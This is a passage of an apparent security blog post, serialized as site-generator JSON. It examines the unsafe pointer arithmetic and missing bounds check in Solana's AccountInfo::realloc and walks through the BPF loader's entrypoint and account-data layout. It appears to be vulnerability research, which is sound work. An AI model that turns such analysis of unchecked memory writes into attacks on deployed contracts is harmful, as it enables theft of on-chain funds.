data\n",{"type":25,"tag":216,"props":17804,"children":17805},{"class":6922,"line":7244},[17806,17810,17815,17819,17823,17827,17832,17837,17841,17846,17850,17854,17859,17863,17867,17871,17875,17879,17883,17887,17891],{"type":25,"tag":216,"props":17807,"children":17808},{"style":6936},[17809],{"type":31,"value":7011},{"type":25,"tag":216,"props":17811,"children":17812},{"style":6947},[17813],{"type":31,"value":17814}," ptr",{"type":25,"tag":216,"props":17816,"children":17817},{"style":6953},[17818],{"type":31,"value":6956},{"type":25,"tag":216,"props":17820,"children":17821},{"style":6936},[17822],{"type":31,"value":17754},{"type":25,"tag":216,"props":17824,"children":17825},{"style":6953},[17826],{"type":31,"value":179},{"type":25,"tag":216,"props":17828,"children":17829},{"style":7047},[17830],{"type":31,"value":17831},"try_borrow_mut_data",{"type":25,"tag":216,"props":17833,"children":17834},{"style":6964},[17835],{"type":31,"value":17836},"()",{"type":25,"tag":216,"props":17838,"children":17839},{"style":6953},[17840],{"type":31,"value":7081},{"type":25,"tag":216,"props":17842,"children":17843},{"style":7047},[17844],{"type":31,"value":17845},"as_mut_ptr",{"type":25,"tag":216,"props":17847,"children":17848},{"style":6964},[17849],{"type":31,"value":17836},{"type":25,"tag":216,"props":17851,"children":17852},{"style":6953},[17853],{"type":31,"value":179},{"type":25,"tag":216,"props":17855,"children":17856},{"style":7047},[17857],{"type":31,"value":17858},"offset",{"type":25,"tag":216,"props":17860,"children":17861},{"style":6964},[17862],{"type":31,"value":1850},{"type":25,"tag":216,"props":17864,"children":17865},{"style":6953},[17866],{"type":31,"value":8276},{"type":25,"tag":216,"props":17868,"children":17869},{"style":6989},[17870],{"type":31,"value":8031},{"type":25,"tag":216,"props":17872,"children":17873},{"style":6964},[17874],{"type":31,"value":7036},{"type":25,"tag":216,"props":17876,"children":17877},{"style":6936},[17878],{"type":31,"value":12795},{"type":25,"tag":216,"props":17880,"children":17881},{"style":6953},[17882],{"type":31,"value":13773},{"type":25,"tag":216,"props":17884,"children":17885},{"style":6936},[17886],{"type":31,"value":7691},{"type":25,"tag":216,"props":17888,"children":17889},{"style":7375},[17890],{"type":31,"value":9811},{"type":25,"tag":216,"props":17892,"children":17893},{"style":6964},[17894],{"type":31,"value":6967},{"type":25,"tag":216,"props":17896,"children":17897},{"class":6922,"line":7257},[17898,17902,17907,17911,17916,17920,17924],{"type":25,"tag":216,"props":17899,"children":17900},{"style":6953},[17901],{"type":31,"value":11703},{"type":25,"tag":216,"props":17903,"children":17904},{"style":6947},[17905],{"type":31,"value":17906},"ptr",{"type":25,"tag":216,"props":17908,"children":17909},{"style":6953},[17910],{"type":31,"value":6956},{"type":25,"tag":216,"props":17912,"children":17913},{"style":6947},[17914],{"type":31,"value":17915}," new_len",{"type":25,"tag":216,"props":17917,"children":17918},{"style":6936},[17919],{"type":31,"value":12781},{"type":25,"tag":216,"props":17921,"children":17922},{"style":7375},[17923],{"type":31,"value":9811},{"type":25,"tag":216,"props":17925,"children":17926},{"style":6964},[17927],{"type":31,"value":6967},{"type":25,"tag":216,"props":17929,"children":17930},{"class":6922,"line":7275},[17931],{"type":25,"tag":216,"props":17932,"children":17933},{"emptyLinePlaceholder":16},[17934],{"type":31,"value":7642},{"type":25,"tag":216,"props":17936,"children":17937},{"class":6922,"line":7296},[17938],{"type":25,"tag":216,"props":17939,"children":17940},{"style":6927},[17941],{"type":31,"value":17942},"        // Then set the new length in the local slice\n",{"type":25,"tag":216,"props":17944,"children":17945},{"class":6922,"line":7305},[17946,17950,17954,17958,17962,17966,17970,17975,17979,17983,17987,17991,17996,18001,18005,18009,18013,18017,18021,18025,18029,18033,18037,18041,18045,18049,18053,18057,18061,18065,18069],{"type":25,"tag":216,"props":17947,"children":17948},{"style":6936},[17949],{"type":31,"value":7011},{"type":25,"tag":216,"props":17951,"children":17952},{"style":6947},[17953],{"type":31,"value":17814},{"type":25,"tag":216,"props":17955,"children":17956},{"style":6953},[17957],{"type":31,"value":6956},{"type":25,"tag":216,"props":17959,"children":17960},{"style":6953},[17961],{"type":31,"value":11093},{"type":25,"tag":216,"props":17963,"children":17964},{"style":6936},[17965],{"type":31,"value":7691},{"type":25,"tag":216,"props":17967,"children":17968},{"style":6953},[17969],{"type":31,"value":13773},{"type":25,"tag":216,"props":17971,"children":17972},{"style":6964},[17973],{"type":31,"value":17974},"(((",{"type":25,"tag":216,"props":17976,"children":17977},{"style":6936},[17978],{"type":31,"value":17670},{"type":25,"tag":216,"props":17980,"children":17981},{"style":6953},[17982],{"type":31,"value":179},{"type":25,"tag":216,"props":17984,"children":17985},{"style":6964},[17986],{"type":31,"value":7669},{"type":25,"tag":216,"props":17988,"children":17989},{"style":6953},[17990],{"type":31,"value":179},{"type":25,"tag":216,"props":17992,"children":17993},{"style":7047},[17994],{"type":31,"value":17995},"as_ptr",{"type":25,"tag":216,"props":17997,"children":17998},{"style":6964},[17999],{"type":31,"value":18000},"() ",{"type":25,"tag":216,"props":18002,"children":18003},{"style":6936},[18004],{"type":31,"value":12795},{"type":25,"tag":216,"props":18006,"children":18007},{"style":6953},[18008],{"type":31,"value":13773},{"type":25,"tag":216,"props":18010,"children":18011},{"style":6936},[18012],{"type":31,"value":13611},{"type":25,"tag":216,"props":18014,"children":18015},{"style":7375},[18016],{"type":31,"value":9811},{"type":25,"tag":216,"props":18018,"children":18019},{"style":6964},[18020],{"type":31,"value":1888},{"type":25,"tag":216,"props":18022,"children":18023},{"style":6953},[18024],{"type":31,"value":179},{"type":25,"tag":216,"props":18026,"children":18027},{"style":7047},[18028],{"type":31,"value":17858},{"type":25,"tag":216,"props":18030,"children":18031},{"style":6964},[18032],{"type":31,"value":1850},{"type":25,"tag":216,"props":18034,"children":18035},{"style":6989},[18036],{"type":31,"value":184},{"type":25,"tag":216,"props":18038,"children":18039},{"style":6964},[18040],{"type":31,"value":7036},{"type":25,"tag":216,"props":18042,"children":18043},{"style":6936},[18044],{"type":31,"value":12795},{"type":25,"tag":216,"props":18046,"children":18047},{"style":7375},[18048],{"type":31,"value":9811},{"type":25,"tag":216,"props":18050,"children":18051},{"style":6964},[18052],{"type":31,"value":7036},{"type":25,"tag":216,"props":18054,"children":18055},{"style":6936},[18056],{"type":31,"value":12795},{"type":25,"tag":216,"props":18058,"children":18059},{"style":6953},[18060],{"type":31,"value":13773},{"type":25,"tag":216,"props":18062,"children":18063},{"style":6936},[18064],{"type":31,"value":7691},{"type":25,"tag":216,"props":18066,"children":18067},{"style":7375},[18068],{"type":31,"value":9811},{"type":25,"tag":216,"props":18070,"children":18071},{"style":6964},[18072],{"type":31,"value":7797},{"type":25,"tag":216,"props":18074,"children":18075},{"class":6922,"line":7557},[18076,18080,18084,18088,18092,18096,18100],{"type":25,"tag":216,"props":18077,"children":18078},{"style":6953},[18079],{"type":31,"value":11703},{"type":25,"tag":216,"props":18081,"children":18082},{"style":6947},[18083],{"type":31,"value":17906},{"type":25,"tag":216,"props":18085,"children":18086},{"style":6953},[18087],{"type":31,"value":6956},{"type":25,"tag":216,"props":18089,"children":18090},{"style":6947},[18091],{"type":31,"value":17915},{"type":25,"tag":216,"props":18093,"children":18094},{"style":6936},[18095],{"type":31,"value":12781},{"type":25,"tag":216,"props":18097,"children":18098},{"style":7375},[18099],{"type":31,"value":9811},{"type":25,"tag":216,"props":18101,"children":18102},{"style":6964},[18103],{"type":31,"value":6967},{"type":25,"tag":216,"props":18105,"children":18106},{"class":6922,"line":7574},[18107],{"type":25,"tag":216,"props":18108,"children":18109},{"style":6964},[18110],{"type":31,"value":7311},{"type":25,"tag":216,"props":18112,"children":18113},{"class":6922,"line":7591},[18114],{"type":25,"tag":216,"props":18115,"children":18116},{"emptyLinePlaceholder":16},[18117],{"type":31,"value":7642},{"type":25,"tag":216,"props":18119,"children":18120},{"class":6922,"line":7604},[18121],{"type":25,"tag":216,"props":18122,"children":18123},{"style":6927},[18124],{"type":31,"value":18125},"    // zero-init if requested\n",{"type":25,"tag":216,"props":18127,"children":18128},{"class":6922,"line":7613},[18129,18133,18138,18143,18147,18152,18156],{"type":25,"tag":216,"props":18130,"children":18131},{"style":6973},[18132],{"type":31,"value":16235},{"type":25,"tag":216,"props":18134,"children":18135},{"style":6947},[18136],{"type":31,"value":18137}," zero_init",{"type":25,"tag":216,"props":18139,"children":18140},{"style":6953},[18141],{"type":31,"value":18142}," &&",{"type":25,"tag":216,"props":18144,"children":18145},{"style":6947},[18146],{"type":31,"value":17915},{"type":25,"tag":216,"props":18148,"children":18149},{"style":6953},[18150],{"type":31,"value":18151}," >",{"type":25,"tag":216,"props":18153,"children":18154},{"style":6947},[18155],{"type":31,"value":17745},{"type":25,"tag":216,"props":18157,"children":18158},{"style":6964},[18159],{"type":31,"value":7241},{"type":25,"tag":216,"props":18161,"children":18162},{"class":6922,"line":7636},[18163,18168],{"type":25,"tag":216,"props":18164,"children":18165},{"style":7047},[18166],{"type":31,"value":18167},"        sol_memset",{"type":25,"tag":216,"props":18169,"children":18170},{"style":6964},[18171],{"type":31,"value":7420},{"type":25,"tag":216,"props":18173,"children":18174},{"class":6922,"line":7645},[18175,18179,18183,18187,18191,18195,18199,18203,18207,18212,18216],{"type":25,"tag":216,"props":18176,"children":18177},{"style":6953},[18178],{"type":31,"value":11636},{"type":25,"tag":216,"props":18180,"children":18181},{"style":6936},[18182],{"type":31,"value":7691},{"type":25,"tag":216,"props":18184,"children":18185},{"style":6936},[18186],{"type":31,"value":17754},{"type":25,"tag":216,"props":18188,"children":18189},{"style":6953},[18190],{"type":31,"value":179},{"type":25,"tag":216,"props":18192,"children":18193},{"style":7047},[18194],{"type":31,"value":17831},{"type":25,"tag":216,"props":18196,"children":18197},{"style":6964},[18198],{"type":31,"value":17836},{"type":25,"tag":216,"props":18200,"children":18201},{"style":6953},[18202],{"type":31,"value":604},{"type":25,"tag":216,"props":18204,"children":18205},{"style":6964},[18206],{"type":31,"value":7701},{"type":25,"tag":216,"props":18208,"children":18209},{"style":6947},[18210],{"type":31,"value":18211},"orig_len",{"type":25,"tag":216,"props":18213,"children":18214},{"style":6953},[18215],{"type":31,"value":6997},{"type":25,"tag":216,"props":18217,"children":18218},{"style":6964},[18219],{"type":31,"value":18220},"],\n",{"type":25,"tag":216,"props":18222,"children":18223},{"class":6922,"line":7654},[18224,18229],{"type":25,"tag":216,"props":18225,"children":18226},{"style":6989},[18227],{"type":31,"value":18228},"            0",{"type":25,"tag":216,"props":18230,"children":18231},{"style":6964},[18232],{"type":31,"value":7465},{"type":25,"tag":216,"props":18234,"children":18235},{"class":6922,"line":7722},[18236,18241,18245,18250,18254,18258],{"type":25,"tag":216,"props":18237,"children":18238},{"style":6947},[18239],{"type":31,"value":18240},"            new_len",{"type":25,"tag":216,"props":18242,"children":18243},{"style":6953},[18244],{"type":31,"value":179},{"type":25,"tag":216,"props":18246,"children":18247},{"style":7047},[18248],{"type":31,"value":18249},"saturating_sub",{"type":25,"tag":216,"props":18251,"children":18252},{"style":6964},[18253],{"type":31,"value":1850},{"type":25,"tag":216,"props":18255,"children":18256},{"style":6947},[18257],{"type":31,"value":18211},{"type":25,"tag":216,"props":18259,"children":18260},{"style":6964},[18261],{"type":31,"value":10688},{"type":25,"tag":216,"props":18263,"children":18264},{"class":6922,"line":7730},[18265],{"type":25,"tag":216,"props":18266,"children":18267},{"style":6964},[18268],{"type":31,"value":11695},{"type":25,"tag":216,"props":18270,"children":18271},{"class":6922,"line":7760},[18272],{"type":25,"tag":216,"props":18273,"children":18274},{"style":6964},[18275],{"type":31,"value":7311},{"type":25,"tag":216,"props":18277,"children":18278},{"class":6922,"line":7768},[18279],{"type":25,"tag":216,"props":18280,"children":18281},{"emptyLinePlaceholder":16},[18282],{"type":31,"value":7642},{"type":25,"tag":216,"props":18284,"children":18285},{"class":6922,"line":7800},[18286,18291],{"type":25,"tag":216,"props":18287,"children":18288},{"style":7375},[18289],{"type":31,"value":18290},"    Ok",{"type":25,"tag":216,"props":18292,"children":18293},{"style":6964},[18294],{"type":31,"value":18295},"(())\n",{"type":25,"tag":216,"props":18297,"children":18298},{"class":6922,"line":7808},[18299],{"type":25,"tag":216,"props":18300,"children":18301},{"style":6964},[18302],{"type":31,"value":7874},{"type":25,"tag":38,"props":18304,"children":18305},{},[18306,18308,18314,18316,18321],{"type":31,"value":18307},"Oh. There's ",{"type":25,"tag":82,"props":18309,"children":18311},{"className":18310},[],[18312],{"type":31,"value":18313},"unsafe",{"type":31,"value":18315},". And no bounds check in sight. ",{"type":25,"tag":64,"props":18317,"children":18318},{},[18319],{"type":31,"value":18320},"And",{"type":31,"value":18322}," pointer math. That doesn't look promising...",{"type":25,"tag":26,"props":18324,"children":18326},{"id":18325},"breaking-down-realloc",[18327,18329],{"type":31,"value":18328},"Breaking down ",{"type":25,"tag":82,"props":18330,"children":18332},{"className":18331},[],[18333],{"type":31,"value":17595},{"type":25,"tag":38,"props":18335,"children":18336},{},[18337,18339,18344],{"type":31,"value":18338},"Let's pick apart this ",{"type":25,"tag":82,"props":18340,"children":18342},{"className":18341},[],[18343],{"type":31,"value":18313},{"type":31,"value":18345}," block, since there's a lot going on here.",{"type":25,"tag":206,"props":18347,"children":18349},{"className":6915,"code":18348,"language":6914,"meta":7,"style":7},"// First set new length in the serialized data\nlet ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n*ptr = new_len as u64;\n",[18350],{"type":25,"tag":82,"props":18351,"children":18352},{"__ignoreMap":7},[18353,18361,18448],{"type":25,"tag":216,"props":18354,"children":18355},{"class":6922,"line":6923},[18356],{"type":25,"tag":216,"props":18357,"children":18358},{"style":6927},[18359],{"type":31,"value":18360},"// First set new length in the serialized data\n",{"type":25,"tag":216,"props":18362,"children":18363},{"class":6922,"line":6769},[18364,18368,18372,18376,18380,18384,18388,18392,18396,18400,18404,18408,18412,18416,18420,18424,18428,18432,18436,18440,18444],{"type":25,"tag":216,"props":18365,"children":18366},{"style":6936},[18367],{"type":31,"value":15743},{"type":25,"tag":216,"props":18369,"children":18370},{"style":6947},[18371],{"type":31,"value":17814},{"type":25,"tag":216,"props":18373,"children":18374},{"style":6953},[18375],{"type":31,"value":6956},{"type":25,"tag":216,"props":18377,"children":18378},{"style":6936},[18379],{"type":31,"value":17754},{"type":25,"tag":216,"props":18381,"children":18382},{"style":6953},[18383],{"type":31,"value":179},{"type":25,"tag":216,"props":18385,"children":18386},{"style":7047},[18387],{"type":31,"value":17831},{"type":25,"tag":216,"props":18389,"children":18390},{"style":6964},[18391],{"type":31,"value":17836},{"type":25,"tag":216,"props":18393,"children":18394},{"style":6953},[18395],{"type":31,"value":7081},{"type":25,"tag":216,"props":18397,"children":18398},{"style":7047},[18399],{"type":31,"value":17845},{"type":25,"tag":216,"props":18401,"children":18402},{"style":6964},[18403],{"type":31,"value":17836},{"type":25,"tag":216,"props":18405,"children":18406},{"style":6953},[18407],{"type":31,"value":179},{"type":25,"tag":216,"props":18409,"children":18410},{"style":7047},[18411],{"type":31,"value":17858},{"type":25,"tag":216,"props":18413,"children":18414},{"style":6964},[18415],{"type":31,"value":1850},{"type":25,"tag":216,"props":18417,"children":18418},{"style":6953},[18419],{"type":31,"value":8276},{"type":25,"tag":216,"props":18421,"children":18422},{"style":6989},[18423],{"type":31,"value":8031},{"type":25,"tag":216,"props":18425,"children":18426},{"style":6964},[18427],{"type":31,"value":7036},{"type":25,"tag":216,"props":18429,"children":18430},{"style":6936},[18431],{"type":31,"value":12795},{"type":25,"tag":216,"props":18433,"children":18434},{"style":6953},[18435],{"type":31,"value":13773},{"type":25,"tag":216,"props":18437,"children":18438},{"style":6936},[18439],{"type":31,"value":7691},{"type":25,"tag":216,"props":18441,"children":18442},{"style":7375},[18443],{"type":31,"value":9811},{"type":25,"tag":216,"props":18445,"children":18446},{"style":6964},[18447],{"type":31,"value":6967},{"type":25,"tag":216,"props":18449,"children":18450},{"class":6922,"line":6778},[18451,18455,18459,18463,18467,18471,18475],{"type":25,"tag":216,"props":18452,"children":18453},{"style":6953},[18454],{"type":31,"value":8519},{"type":25,"tag":216,"props":18456,"children":18457},{"style":6947},[18458],{"type":31,"value":17906},{"type":25,"tag":216,"props":18460,"children":18461},{"style":6953},[18462],{"type":31,"value":6956},{"type":25,"tag":216,"props":18464,"children":18465},{"style":6947},[18466],{"type":31,"value":17915},{"type":25,"tag":216,"props":18468,"children":18469},{"style":6936},[18470],{"type":31,"value":12781},{"type":25,"tag":216,"props":18472,"children":18473},{"style":7375},[18474],{"type":31,"value":9811},{"type":25,"tag":216,"props":18476,"children":18477},{"style":6964},[18478],{"type":31,"value":6967},{"type":25,"tag":38,"props":18480,"children":18481},{},[18482,18487],{"type":25,"tag":82,"props":18483,"children":18485},{"className":18484},[],[18486],{"type":31,"value":17831},{"type":31,"value":18488}," returns a mutable reference to the underlying buffer holding the data of the account. Normally in the course of contract execution, this comes from the serialized buffer passed into the contract by the BPF loader. So before we can understand the details here, let's take a quick detour...",{"type":25,"tag":606,"props":18490,"children":18492},{"id":18491},"bpf-loader-abi",[18493],{"type":31,"value":18494},"BPF Loader ABI",{"type":25,"tag":38,"props":18496,"children":18497},{},[18498,18500,18505,18507,18520],{"type":31,"value":18499},"Solana smart contracts have one job: interact with on-chain accounts. So what's the interface between the contract and the rest of the chain? To answer that, we're going to take a look at ",{"type":25,"tag":82,"props":18501,"children":18503},{"className":18502},[],[18504],{"type":31,"value":17610},{"type":31,"value":18506},"'s entrypoint code - the code that's added when you use the ",{"type":25,"tag":162,"props":18508,"children":18511},{"href":18509,"rel":18510},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#116-131",[166],[18512,18518],{"type":25,"tag":82,"props":18513,"children":18515},{"className":18514},[],[18516],{"type":31,"value":18517},"entrypoint!",{"type":31,"value":18519}," macro",{"type":31,"value":1472},{"type":25,"tag":206,"props":18522,"children":18524},{"className":6915,"code":18523,"language":6914,"meta":7,"style":7},"#[no_mangle]\npub unsafe extern \"C\" fn entrypoint(input: *mut u8) -> u64 {\n    let (program_id, accounts, instruction_data) =\n        unsafe { $crate::entrypoint::deserialize(input) };\n    match $process_instruction(&program_id, &accounts, &instruction_data) {\n        Ok(()) => $crate::entrypoint::SUCCESS,\n        Err(error) => error.into(),\n    }\n}\n",[18525],{"type":25,"tag":82,"props":18526,"children":18527},{"__ignoreMap":7},[18528,18536,18608,18651,18703,18762,18805,18848,18855],{"type":25,"tag":216,"props":18529,"children":18530},{"class":6922,"line":6923},[18531],{"type":25,"tag":216,"props":18532,"children":18533},{"style":6964},[18534],{"type":31,"value":18535},"#[no_mangle]\n",{"type":25,"tag":216,"props":18537,"children":18538},{"class":6922,"line":6769},[18539,18543,18548,18553,18558,18562,18567,18571,18575,18579,18583,18587,18592,18596,18600,18604],{"type":25,"tag":216,"props":18540,"children":18541},{"style":6936},[18542],{"type":31,"value":17647},{"type":25,"tag":216,"props":18544,"children":18545},{"style":6936},[18546],{"type":31,"value":18547}," unsafe",{"type":25,"tag":216,"props":18549,"children":18550},{"style":6936},[18551],{"type":31,"value":18552}," extern",{"type":25,"tag":216,"props":18554,"children":18555},{"style":8205},[18556],{"type":31,"value":18557}," \"C\"",{"type":25,"tag":216,"props":18559,"children":18560},{"style":6936},[18561],{"type":31,"value":17652},{"type":25,"tag":216,"props":18563,"children":18564},{"style":7047},[18565],{"type":31,"value":18566}," entrypoint",{"type":25,"tag":216,"props":18568,"children":18569},{"style":6964},[18570],{"type":31,"value":1850},{"type":25,"tag":216,"props":18572,"children":18573},{"style":6947},[18574],{"type":31,"value":12319},{"type":25,"tag":216,"props":18576,"children":18577},{"style":6953},[18578],{"type":31,"value":1472},{"type":25,"tag":216,"props":18580,"children":18581},{"style":6953},[18582],{"type":31,"value":13773},{"type":25,"tag":216,"props":18584,"children":18585},{"style":6936},[18586],{"type":31,"value":7691},{"type":25,"tag":216,"props":18588,"children":18589},{"style":7375},[18590],{"type":31,"value":18591}," u8",{"type":25,"tag":216,"props":18593,"children":18594},{"style":6964},[18595],{"type":31,"value":7036},{"type":25,"tag":216,"props":18597,"children":18598},{"style":6953},[18599],{"type":31,"value":17714},{"type":25,"tag":216,"props":18601,"children":18602},{"style":7375},[18603],{"type":31,"value":9811},{"type":25,"tag":216,"props":18605,"children":18606},{"style":6964},[18607],{"type":31,"value":7241},{"type":25,"tag":216,"props":18609,"children":18610},{"class":6922,"line":6778},[18611,18615,18619,18624,18628,18633,18637,18642,18646],{"type":25,"tag":216,"props":18612,"children":18613},{"style":6936},[18614],{"type":31,"value":6939},{"type":25,"tag":216,"props":18616,"children":18617},{"style":6964},[18618],{"type":31,"value":7016},{"type":25,"tag":216,"props":18620,"children":18621},{"style":6947},[18622],{"type":31,"value":18623},"program_id",{"type":25,"tag":216,"props":18625,"children":18626},{"style":6964},[18627],{"type":31,"value":7026},{"type":25,"tag":216,"props":18629,"children":18630},{"style":6947},[18631],{"type":31,"value":18632},"accounts",{"type":25,"tag":216,"props":18634,"children":18635},{"style":6964},[18636],{"type":31,"value":7026},{"type":25,"tag":216,"props":18638,"children":18639},{"style":6947},[18640],{"type":31,"value":18641},"instruction_data",{"type":25,"tag":216,"props":18643,"children":18644},{"style":6964},[18645],{"type":31,"value":7036},{"type":25,"tag":216,"props":18647,"children":18648},{"style":6953},[18649],{"type":31,"value":18650},"=\n",{"type":25,"tag":216,"props":18652,"children":18653},{"class":6922,"line":7005},[18654,18659,18663,18667,18672,18676,18681,18685,18690,18694,18698],{"type":25,"tag":216,"props":18655,"children":18656},{"style":6936},[18657],{"type":31,"value":18658},"        unsafe",{"type":25,"tag":216,"props":18660,"children":18661},{"style":6964},[18662],{"type":31,"value":13542},{"type":25,"tag":216,"props":18664,"children":18665},{"style":6953},[18666],{"type":31,"value":14245},{"type":25,"tag":216,"props":18668,"children":18669},{"style":6936},[18670],{"type":31,"value":18671},"crate",{"type":25,"tag":216,"props":18673,"children":18674},{"style":6953},[18675],{"type":31,"value":7438},{"type":25,"tag":216,"props":18677,"children":18678},{"style":6964},[18679],{"type":31,"value":18680},"entrypoint",{"type":25,"tag":216,"props":18682,"children":18683},{"style":6953},[18684],{"type":31,"value":7438},{"type":25,"tag":216,"props":18686,"children":18687},{"style":7047},[18688],{"type":31,"value":18689},"deserialize",{"type":25,"tag":216,"props":18691,"children":18692},{"style":6964},[18693],{"type":31,"value":1850},{"type":25,"tag":216,"props":18695,"children":18696},{"style":6947},[18697],{"type":31,"value":12319},{"type":25,"tag":216,"props":18699,"children":18700},{"style":6964},[18701],{"type":31,"value":18702},") };\n",{"type":25,"tag":216,"props":18704,"children":18705},{"class":6922,"line":7110},[18706,18711,18716,18721,18725,18729,18733,18737,18741,18745,18749,18753,18757],{"type":25,"tag":216,"props":18707,"children":18708},{"style":6973},[18709],{"type":31,"value":18710},"    match",{"type":25,"tag":216,"props":18712,"children":18713},{"style":6953},[18714],{"type":31,"value":18715}," $",{"type":25,"tag":216,"props":18717,"children":18718},{"style":6947},[18719],{"type":31,"value":18720},"process_instruction",{"type":25,"tag":216,"props":18722,"children":18723},{"style":6964},[18724],{"type":31,"value":1850},{"type":25,"tag":216,"props":18726,"children":18727},{"style":6953},[18728],{"type":31,"value":7059},{"type":25,"tag":216,"props":18730,"children":18731},{"style":6947},[18732],{"type":31,"value":18623},{"type":25,"tag":216,"props":18734,"children":18735},{"style":6964},[18736],{"type":31,"value":7026},{"type":25,"tag":216,"props":18738,"children":18739},{"style":6953},[18740],{"type":31,"value":7059},{"type":25,"tag":216,"props":18742,"children":18743},{"style":6947},[18744],{"type":31,"value":18632},{"type":25,"tag":216,"props":18746,"children":18747},{"style":6964},[18748],{"type":31,"value":7026},{"type":25,"tag":216,"props":18750,"children":18751},{"style":6953},[18752],{"type":31,"value":7059},{"type":25,"tag":216,"props":18754,"children":18755},{"style":6947},[18756],{"type":31,"value":18641},{"type":25,"tag":216,"props":18758,"children":18759},{"style":6964},[18760],{"type":31,"value":18761},") {\n",{"type":25,"tag":216,"props":18763,"children":18764},{"class":6922,"line":7216},[18765,18770,18775,18780,18784,18788,18792,18796,18800],{"type":25,"tag":216,"props":18766,"children":18767},{"style":7375},[18768],{"type":31,"value":18769},"        Ok",{"type":25,"tag":216,"props":18771,"children":18772},{"style":6964},[18773],{"type":31,"value":18774},"(()) ",{"type":25,"tag":216,"props":18776,"children":18777},{"style":6953},[18778],{"type":31,"value":18779},"=>",{"type":25,"tag":216,"props":18781,"children":18782},{"style":6953},[18783],{"type":31,"value":18715},{"type":25,"tag":216,"props":18785,"children":18786},{"style":6936},[18787],{"type":31,"value":18671},{"type":25,"tag":216,"props":18789,"children":18790},{"style":6953},[18791],{"type":31,"value":7438},{"type":25,"tag":216,"props":18793,"children":18794},{"style":6964},[18795],{"type":31,"value":18680},{"type":25,"tag":216,"props":18797,"children":18798},{"style":6953},[18799],{"type":31,"value":7438},{"type":25,"tag":216,"props":18801,"children":18802},{"style":6964},[18803],{"type":31,"value":18804},"SUCCESS,\n",{"type":25,"tag":216,"props":18806,"children":18807},{"class":6922,"line":7244},[18808,18813,18817,18822,18826,18830,18835,18839,18844],{"type":25,"tag":216,"props":18809,"children":18810},{"style":7375},[18811],{"type":31,"value":18812},"        Err",{"type":25,"tag":216,"props":18814,"children":18815},{"style":6964},[18816],{"type":31,"value":1850},{"type":25,"tag":216,"props":18818,"children":18819},{"style":6947},[18820],{"type":31,"value":18821},"error",{"type":25,"tag":216,"props":18823,"children":18824},{"style":6964},[18825],{"type":31,"value":7036},{"type":25,"tag":216,"props":18827,"children":18828},{"style":6953},[18829],{"type":31,"value":18779},{"type":25,"tag":216,"props":18831,"children":18832},{"style":6947},[18833],{"type":31,"value":18834}," error",{"type":25,"tag":216,"props":18836,"children":18837},{"style":6953},[18838],{"type":31,"value":179},{"type":25,"tag":216,"props":18840,"children":18841},{"style":7047},[18842],{"type":31,"value":18843},"into",{"type":25,"tag":216,"props":18845,"children":18846},{"style":6964},[18847],{"type":31,"value":7448},{"type":25,"tag":216,"props":18849,"children":18850},{"class":6922,"line":7257},[18851],{"type":25,"tag":216,"props":18852,"children":18853},{"style":6964},[18854],{"type":31,"value":7311},{"type":25,"tag":216,"props":18856,"children":18857},{"class":6922,"line":7275},[18858],{"type":25,"tag":216,"props":18859,"children":18860},{"style":6964},[18861],{"type":31,"value":7874},{"type":25,"tag":38,"props":18863,"children":18864},{},[18865,18867,18872,18874,18880,18882,18889,18891,18897,18899,18906],{"type":31,"value":18866},"What we see here is the contract's real entrypoint - it takes a ",{"type":25,"tag":82,"props":18868,"children":18870},{"className":18869},[],[18871],{"type":31,"value":7378},{"type":31,"value":18873}," buffer in from the loader, and calls ",{"type":25,"tag":82,"props":18875,"children":18877},{"className":18876},[],[18878],{"type":31,"value":18879},"solana_program::entrypoint::deserialize",{"type":31,"value":18881},", which then ",{"type":25,"tag":162,"props":18883,"children":18886},{"href":18884,"rel":18885},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#281-337",[166],[18887],{"type":31,"value":18888},"parses out",{"type":31,"value":18890}," all the ",{"type":25,"tag":82,"props":18892,"children":18894},{"className":18893},[],[18895],{"type":31,"value":18896},"AccountInfo",{"type":31,"value":18898},"s, instruction data, and the current running program ID. We can see how the data buffer is ",{"type":25,"tag":162,"props":18900,"children":18903},{"href":18901,"rel":18902},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#308-316",[166],[18904],{"type":31,"value":18905},"laid out",{"type":31,"value":1472},{"type":25,"tag":206,"props":18908,"children":18910},{"className":6915,"code":18909,"language":6914,"meta":7,"style":7},"#[allow(clippy::cast_ptr_alignment)]\nlet data_len = *(input.add(offset) as *const u64) as usize;\noffset += size_of::\u003Cu64>();\n\nlet data = Rc::new(RefCell::new({\n    from_raw_parts_mut(input.add(offset), data_len)\n}));\noffset += data_len + MAX_PERMITTED_DATA_INCREASE;\noffset += (offset as *const u8).align_offset(BPF_ALIGN_OF_U128); // padding\n",[18911],{"type":25,"tag":82,"props":18912,"children":18913},{"__ignoreMap":7},[18914,18931,19011,19044,19051,19099,19143,19151,19175],{"type":25,"tag":216,"props":18915,"children":18916},{"class":6922,"line":6923},[18917,18922,18926],{"type":25,"tag":216,"props":18918,"children":18919},{"style":6964},[18920],{"type":31,"value":18921},"#[allow(clippy",{"type":25,"tag":216,"props":18923,"children":18924},{"style":6953},[18925],{"type":31,"value":7438},{"type":25,"tag":216,"props":18927,"children":18928},{"style":6964},[18929],{"type":31,"value":18930},"cast_ptr_alignment)]\n",{"type":25,"tag":216,"props":18932,"children":18933},{"class":6922,"line":6769},[18934,18938,18943,18947,18951,18955,18959,18963,18967,18971,18975,18979,18983,18987,18991,18995,18999,19003,19007],{"type":25,"tag":216,"props":18935,"children":18936},{"style":6936},[18937],{"type":31,"value":15743},{"type":25,"tag":216,"props":18939,"children":18940},{"style":6947},[18941],{"type":31,"value":18942}," 